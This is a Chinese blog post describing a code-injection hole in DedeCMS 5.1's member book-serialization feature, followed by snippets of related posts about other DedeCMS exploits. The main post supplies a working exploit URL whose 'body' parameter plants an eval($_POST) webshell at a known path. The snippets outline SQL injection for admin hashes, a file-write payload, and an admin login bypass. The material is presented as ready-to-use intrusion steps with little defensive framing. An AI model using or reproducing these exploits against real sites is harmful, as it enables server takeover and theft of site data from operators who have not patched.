DedeCMS 5.1 直接写入马漏洞

最新推荐文章于 2021-03-31 22:05:44 发布

原创最新推荐文章于 2021-03-31 22:05:44 发布 · 1.5k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#fp #function #服务器 #c

本文介绍了一个存在于图书连载功能中的安全漏洞，该漏洞允许攻击者通过特定的PHP代码注入方式，在服务器上写入恶意脚本。利用此漏洞仅需简单请求，即可在服务器指定目录生成包含恶意代码的文件。

最早见于http://groups.google.com/group/ph4nt0m/t/357dbcd7711f1864
经过研究发现。可以很方便的写入一个小马，前提是服务器开放会员系统,而且有图书连载里有类别。
漏洞代码如下：
include/inc_bookfunctions.php

member/story_add_content_action.php

WriteBookText($arcID,addslashes($body));

可以看到，只是用addslashes进行了转义。但是$body = "<"."?php/r/n".$body."/r/n?".">";很明显可以写入一个小马的。呵呵。

利用方法
http://www.target.com/member/story_add_content_action.php?body=eval($_POST[c]);&chapterid=1
这样就在data/textdata/目录下生成小马。默认为data/textdata/1/bk1.php

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

HackCode

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)

李同學的安全圈

05-31

4438

uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一，在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。

渗透测试实战--dedecms漏洞复现

qq_45070118的博客

08-18

6539

实验设备：一台windows服务器，一台kali，一台windows客户端在虚拟机WIN7上使用phpstudy搭站（解压文件将文件放置在phpstudy配置文件WWW中），使用物理机进行攻击，WIN7 IP为192.168.10.5 物理机安装jdk，建立java环境，由此来运行菜刀网页链接是WWW后的路径（http://ip/dedecms/uploads) 根据文件存放位置来定在物理机...

参与评论您还未登录，请先登录后发表或查看评论

DEDECMS 漏洞汇总

weixin_30527551的博客

08-08

6798

日期：2019-08-08 10:20:28 更新：作者：Bay0net 介绍： 0x01、组合拳拿 shell 漏洞版本：v5.5 - v5.7 前台任意用户密码重置首先注册一个账户，账户名为 0000001，此处注册的账户，前面是多个 0，后面是 1 就行。注册链接： http://192.168.31.59/member/index_do.php?fmd...

织梦(Dedecms) 5.1 feedback_js.php 注入漏洞

weixin_33997389的博客

03-21

290

漏洞版本: DEDECMS 5.1 漏洞描述: 同样是在magic_quotes_gpc=off的情况下可用此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl ...... $urlindex = 0; if(empty($arcID)) { $row = $dlist->dsql-...

dedecms注入漏洞feedback.php,织梦(Dedecms) 5.1 feedback_js.php 注入漏洞

weixin_39912580的博客

03-31

354

影响版本:DEDECMS 5.1漏洞描述:同样是在magic_quotes_gpc=off的情况下可用此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl......$urlindex = 0;if(empty($arcID)){$row = $dlist->dsql->GetOne("Select id From...

dedecms注入漏洞feedback.php,织梦(DEDECMS) 5.1 plus/feedback_js.php存在注入漏洞

weixin_32643811的博客

03-31

576

影响版本:dedecms GBK 5.1漏洞描述:在magic_quotes_gpc=off的情况下可用此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl......$urlindex = 0;if(empty($arcID)){$row = $dlist->dsql->GetOne("Select id Fro...

dedecms织梦标签远程文件写入漏洞

weixin_34261415的博客

03-21

272

测试方法: @Sebug.net dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp =@fopen("1.php", \''a\'');@fwrite($fp, \''\''...

（四）mysql数据库总结和渗透测试相关漏洞整理

爱上卿的博客

01-16

2587

1.1 Mysql信息收集 1.端口信息收集 Mysql默认端口是3306端口，但也有自定义端口，针对默认端口扫描主要利用扫描软件进行探测，推荐使用：（1）IIS PUT scanner，直接填写3306端口，IP地址填写单个或者C段地址，速度还是挺快的。（2）nmap扫描nmap -p 3306 192.168.1.1-254 特定目标的渗透，可能需要对全端口进行扫描，可以使...

PHP相关漏洞------学习笔记

tell_me_404的博客

03-07

742

一、PHP文件包含漏洞 1、什么是PHP漏洞程序开发人员一般会把重复使用的函数写到一个单个文件中，在需要使用某个函数的时候直接调用此文件，二无需再次编写，这种文件调用的过程一般被称为文件包含。开发人员为使代码变得更灵活，将被包含的文件设置为变量，用来进行动态调用，但正是由于这种灵活性，导致客户端可以嗲用一个恶意文件，造成文件包含漏洞。几乎所有的脚本语言都会提供文件包含的功能，单文件包含漏洞在PH...

【DedeCms v5.6 GBK后台管理优化】：提高内容发布效率的技巧

DedeCms v5.6 GBK作为一款内容管理系统，其后台管理的性能直接关系到整个网站的运行效率和用户体验。本文对DedeCms v5.6 GBK后台管理的架构、性能评估、优化目标、实践措施以及高级应用进行了深入的探讨。通过系统...

【DedeCms v5.6 GBK数据迁移】：无缝过渡至新版的策略与技巧

![商业源码-编程源码-DedeCms v5.6 GBK build 20100928.zip]...首先介绍了数据迁移前的准备工作，包括理解DedeCms架构、环境搭建和依赖检查以及数据

一次贴近实战的CTF比赛(cookie欺骗、php函数、Tomcat漏洞、注入、逆向等）

渗透、攻防、CTF、编程

06-29

9110

19题170分一、web安全-29 1.cookie欺骗(web登录)9 http://***.***.***.50:8040/admin/login.asp 解题思路： http://***.***.***.50:8151/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,passw...

Dede后台文件任意上传漏洞解决方法

06-26

2373

--media_add.php 上传漏洞　　主要是文件/dede/media_add.php或者/你的后台名字/media_add.php。　　搜索$fullfilename = $cfg_basedir.$filename;(大概在69行左右)　　替换成　　if (preg_match('#.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[...

DEDECMS 爆严重安全漏洞免账号密码直接进入后台

热门推荐

IT技术宅-北方的刀郎

03-21

1万+

DEDECMS 爆严重安全漏洞免账号密码直接进入后台来源：互联网作者：佚名时间：08-20 23:46:44 【大中小】众所周知，因使用简单、客户群多，织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息：DEDECMS爆严重安全漏洞，近期官方会发布相关补丁，望大家及时关注补丁动态。入侵步骤如下：http://www.xx.com/织梦网站后台/login.php?

DEDECMS爆严重安全漏洞免账号密码直接进入后台

收集盒 Book box

08-13

1278

众所周知，因使用简单、客户群多，织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息：“DEDECMS爆严重安全漏洞，近期官方会发布相关补丁，望大家及时关注补丁动态。” 入侵步骤如下：http://www.xx.com/织梦网站后台/login.php

dedeCMS后台代码执行漏洞-CNVD-2018-01221

飞鱼的企鹅的博客

06-20

2151

复现的第一个漏洞，CNVD-2018-01221， DeDeCMS简介织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DeDeCMS V5.7 SP2版本中的tpl.php中存在代码执行漏洞，可以通过该漏洞在增加新标签中上传木马，获取webshell。

dedecms tag.php注入漏洞分析与利用工具

weixin_30267785的博客

08-25

577

author:toby57 [www.toby57.cn] date:2008-08-18 Dedecms算是使用比较广泛的PHP整站系统了，在被使用的同时系统的安全性也被人们关注。在以前dedecms也爆过不少漏洞，官方都很快出了补丁，前几天80sec公布了注射漏洞 http://www.80sec.com/dedecms-sql-injection.html，其实这个系统也受最近很流行的...

后台用户名不存在,密码被修改,spider,新漏洞轻松注入改后台密码

IT技术宅-北方的刀郎

03-21

1980

dedecms后台用户名不存在,密码被修改,spider,新漏洞轻松注入改后台密码dedecms后台用户名不存在,用户名密码被修改,spider,最新漏洞轻松改后台密码而破门而入.dede后台忽然无法登录提示用户名不存在?织梦最新漏洞攻击处理方法如果已经发现/data，有很长一个txt记事本，说明已经被其他人SQL注入了，或是已经有人进行尝试SQL注入了了。记事儿本如：5dfaaed91f3cbd

DedeCMS 5.5靶机

zhangpeng999123的博客

04-26

846

实验内容步骤一：信息收集我们打开终端，输入firefox打开浏览器，访问网址就可以找到版本信息，在首页顶部和底部看到版本信息。 192.168.0.2 访问http://192.168.0.2/robots.txt也可以看见一些信息这个时候，我们就可以去网络上搜索一些dedecms v5.5版本的漏洞。dedecms v5.5版本存在一个任意文件上传，得到shell的...